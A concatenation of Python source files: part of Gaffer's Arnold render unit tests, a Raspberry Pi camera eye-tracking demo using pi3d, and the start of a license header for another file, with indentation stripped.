IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = Gaffer.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 0.75 )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 0 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -96 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 47 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions(), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.registerAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
group["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group["in"].addChild( GafferScene.ScenePlug( "in3" ) )
group["in"].addChild( GafferScene.ScenePlug( "in4" ) )
evaluate = GafferScene.EvaluateLightLinks()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
group["in"]["in1"].setInput( attributes["out"] )
group["in"]["in2"].setInput( light1["out"] )
group["in"]["in3"].setInput( light2["out"] )
group["in"]["in4"].setInput( sphere2["out"] )
evaluate["in"].setInput( group["out"] )
render["in"].setInput( evaluate["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light /group/light1" )
# make sure we pass correct data into the renderer
self.assertEqual(
set( render["in"].attributes( "/group/sphere" )["linkedLights"] ),
set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
)
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere, "use_light_group" )
self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
self.assertEqual( doLinking, True )
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( "/group/sphere1" )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere1, "use_light_group" )
self.assertEqual( lightNames, [] )
self.assertEqual( doLinking, False )
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
self.assertRaisesRegexp( RuntimeError, "Render aborted", s["render"]["task"].execute )
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
if __name__ == "__main__":
unittest.main()
|
eye_cam.py
|
#!/usr/bin/python
from __future__ import absolute_import, division, print_function, unicode_literals
""" Example showing what can be left out. ESC to quit"""
import demo
import pi3d
import numpy as np
import picamera
import picamera.array
import threading
import time
import io
from math import cos, sin, radians
SIZE = 64
NBYTES = SIZE * SIZE * 3
threshold = 40 # HSV value below this will be tracked
POS = np.arange(SIZE, dtype=np.float) # list of numbers for finding av. position
npa = np.zeros((SIZE, SIZE, 4), dtype=np.uint8) # array for loading image
npa[:,:,3] = 255 # set alpha 1.0 (effectively)
new_pic = False
# Create a pool of image processors
done = False
lock = threading.Lock()
pool = []
class ImageProcessor(threading.Thread):
def __init__(self):
super(ImageProcessor, self).__init__()
self.stream = io.BytesIO()
self.event = threading.Event()
self.terminated = False
self.start()
def run(self):
# This method runs in a separate thread
global done, npa, new_pic, SIZE, NBYTES
while not self.terminated:
# Wait for an image to be written to the stream
if self.event.wait(1):
try:
if self.stream.tell() >= NBYTES:
self.stream.seek(0)
# python2 doesn't have the getbuffer() method
#bnp = np.fromstring(self.stream.read(NBYTES),
# dtype=np.uint8).reshape(SIZE, SIZE, 3)
bnp = np.array(self.stream.getbuffer(),
dtype=np.uint8).reshape(SIZE, SIZE, 3)
npa[:,:,0:3] = bnp
new_pic = True
except Exception as e:
print(e)
finally:
# Reset the stream and event
self.stream.seek(0)
self.stream.truncate()
self.event.clear()
# Return ourselves to the pool
with lock:
pool.append(self)
def streams():
while not done:
with lock:
if pool:
processor = pool.pop()
else:
processor = None
if processor:
yield processor.stream
processor.event.set()
else:
# When the pool is starved, wait a while for it to refill
time.sleep(0.1)
def start_capture(): # has to be in yet another thread as blocking
global SIZE, pool
with picamera.PiCamera() as camera:
pool = [ImageProcessor() for i in range(3)]
camera.resolution = (SIZE, SIZE)
camera.framerate = 60
#camera.led = False
time.sleep(2)
camera.shutter_speed = camera.exposure_speed
camera.exposure_mode = 'off'
g = camera.awb_gains
print('g is {}'.format(g))
camera.awb_mode = 'off'
camera.awb_gains = g
camera.capture_sequence(streams(), format='rgb', use_video_port=True)
t = threading.Thread(target=start_capture)
t.start()
while not new_pic:
time.sleep(0.1)
########################################################################
DISPLAY = pi3d.Display.create(x=100, y=100, w=960, h=720)
DW, DH = DISPLAY.width, DISPLAY.height
CAMERA = pi3d.Camera(is_3d=False)
shader = pi3d.Shader("uv_flat")
matsh = pi3d.Shader("mat_flat")
tex = pi3d.Texture(npa)
screen = pi3d.Sprite(w=SIZE * 4, h=SIZE * 4, z=1.0)
screen.set_draw_details(shader, [tex])
target = pi3d.Sprite(w=20, h=20, z=0.9)
target.set_material([1.0, 0.7, 0.0])
target.set_shader(matsh)
# Fetch key presses ----------------------
mykeys = pi3d.Keyboard()
ax, ay, bx, by, cx, cy, dx, dy = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
BA, DA, CD, CB = 0.0, 0.0, 0.0, 0.0
SM = 0.98
nf = 0
tm = time.time()
mode = 0
while DISPLAY.loop_running():
k = mykeys.read()
if k >-1:
if k==27:
mykeys.close()
DISPLAY.destroy()
break
elif k==ord(' '): # space bar
mode = (mode + 1) % 6
elif k==ord('l'):
threshold *= 0.9
elif k==ord('o'):
threshold *= 1.1
if new_pic:
drk = np.zeros((SIZE, SIZE)) # 2D grid fill with 0.0
drk[np.where(npa[:,:,:3].max(axis=2) < threshold)] = 1.0 # change to 1.0 where img is dark
npa[:,:,0] = drk * 255
tot = drk.sum() # total sum for grid
if tot > 0:
x = (drk.sum(axis=0) * POS).sum() / tot # mean of dark pixels
y = (drk.sum(axis=1) * POS).sum() / tot
if mode == 0:
target.position(-DW / 2, -DH / 2, 0.9)
ax = ax * SM + x * (1.0 - SM)
ay = ay * SM + y * (1.0 - SM)
elif mode == 1:
target.position(-DW / 2, DH / 2, 0.9)
bx = bx * SM + x * (1.0 - SM)
by = by * SM + y * (1.0 - SM)
elif mode == 2:
target.position(DW / 2, DH / 2, 0.9)
cx = cx * SM + x * (1.0 - SM)
cy = cy * SM + y * (1.0 - SM)
elif mode == 3:
target.position(DW / 2, -DH / 2, 0.9)
dx = dx * SM + x * (1.0 - SM)
dy = dy * SM + y * (1.0 - SM)
elif mode == 4:
BA = (bx - ax) / (by - ay)
CD = (cx - dx) / (cy - dy)
DA = (dy - ay) / (dx - ax)
CB = (cy - by) / (cx - bx)
else:
target.position(-DW / 2 + DW * (x - ax - (y - ay) * BA) /
(dx + (y - dy) * CD - ax - (y - ay) * BA),
-DH / 2 + DH * (y - ay - (x - ax) * DA) /
(by + (x - bx) * CB - ay - (x - ax) * DA), 1.0)
if tot > 60.0:
threshold *= 0.99
if tot < 50.0:
threshold *= 1.01
tex.update_ndarray(npa)
new_pic = False
nf += 1
screen.draw()
target.draw()
print(nf / (time.time() - tm))
print(tot, threshold)
# Shut down the processors in an orderly fashion
while pool:
done = True
with lock:
processor = pool.pop()
processor.terminated = True
processor.join()
|
MessageHandler.py
|
##########################################################################
#
# Copyright (c) 2007-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
